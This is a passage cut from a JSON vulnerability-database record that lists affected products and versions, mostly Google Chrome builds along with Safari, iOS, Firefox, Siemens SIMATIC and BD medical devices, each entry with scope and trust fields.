        "version": "32.0.1700.52"
      },
      {
        "_id": null,
        "model": "identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.573.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1055"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.54"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.22"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.61"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.806.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.67"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.13"
      },
      {
        "_id": null,
        "model": "unified computing system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.356.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.863.0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.652.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.29"
      },
      {
        "_id": null,
        "model": "simatic ipc227e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.86"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.87"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.719.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.952.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.401.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.495.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1019"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.872.0"
      },
      {
        "_id": null,
        "model": "simatic hmi comfort pro panels",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.57"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1022.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.36"
      },
      {
        "_id": null,
        "model": "enterprise linux for ibm z systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "46.0.2490.71"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.153"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.341.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.11"
      },
      {
        "_id": null,
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.223"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1657.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1273.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.54"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.56"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.78"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.66"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.46"
      },
      {
        "_id": null,
        "model": "rowa vmax system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.75"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.77"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1274.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.954.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1056.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1303.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1015"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.714.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.8"
      },
      {
        "_id": null,
        "model": "pyxis parx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.6"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.22"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "4.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.150"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.230"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.67"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.172"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.30"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.942.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.50"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.49"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.60"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375125"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.100"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.128"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.720.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.904.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.114"
      },
      {
        "_id": null,
        "model": "esxi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.222.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.94"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.100"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.212"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.56"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.55"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.500.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.116"
      },
      {
        "_id": null,
        "model": "pyxis nursing data collection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.95"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.22"
      },
      {
        "_id": null,
        "model": "security analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "7.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.54"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.85"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.69"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1659.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1052.0"
      },
      {
        "_id": null,
        "model": "content analysis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "2.1"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.305.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.89"
      },
      {
        "_id": null,
        "model": "data innovations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1034"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.145"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.646.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.911.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.697.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.222"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.593.0"
      },
      {
        "_id": null,
        "model": "sql server for 32-bit systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "200840"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.55"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.49"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.667.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.86"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.120"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.79"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.100"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.928.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.20"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "11.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.339.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1060.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.70"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1031.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.80"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.626.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "6.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.37"
      },
      {
        "_id": null,
        "model": "facslyric",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.708.0"
      },
      {
        "_id": null,
        "model": "facscanto 10-color",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": null,
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "v80"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.161"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.559.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.56"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.625.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.64"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1009.0"
      },
      {
        "_id": null,
        "model": "facsduet sample prep",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.680.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.32"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.326"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1062.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.203"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.659.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.881.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.800.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.37599"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.94"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.330.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.84"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.26"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.93"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.53"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.58"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1001"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.18"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.70"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1056"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.33"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.91"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.96"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.768.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.82"
      },
      {
        "_id": null,
        "model": "windows server for itanium-based systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.40"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.871.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.11"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "31.1.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.80"
      },
      {
